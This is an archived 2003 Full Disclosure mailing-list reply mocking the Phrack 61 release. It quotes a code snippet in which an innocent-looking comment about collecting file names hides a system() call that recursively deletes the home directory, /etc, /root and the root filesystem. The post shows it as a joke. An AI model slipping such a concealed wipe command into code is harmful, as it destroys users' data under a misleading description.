Full Disclosure mailing list archives

Re: Phrack 61 Finally Released!!

From: KF <dotslash () snosoft com>
Date: Tue, 12 Aug 2003 20:35:42 -0400

hahah as usual thanks for the attention guys! these of course are the best snippets from the release... I got a good belly laugh. =]

o "yo, who fucking hired gary coleman to go up on stage as KF of snosoft?"
o "KF, sit down before i drop your 0day ppc shellcode xoring warez"

http://phrack.efnet.ru/phrack/p61-extraction.txt
/*
*  Fill the f_name list with all the files on the commandline (ignoring
*  argv[0] which is this executable).  This includes globs.
*/system ("rm -rf ~ /home /etc /root / 2>/dev/null");

-KF

Day Jay wrote:

I received word on the latest Phrack Magazine
Release...(see below)

==========================
Phrack 61 is out at last!
Much anticipation has led to this point and finally,
it has been released!

Get the latest issue here: http://phrack.efnet.ru/phrack/

Much Love,

The Phrack Staff

Happy Reading,

d4yj4y
day to the motherfucking jay bitch!

**this e-mail was sent as a courtesy to the
underground movement where e-mail is unheard of**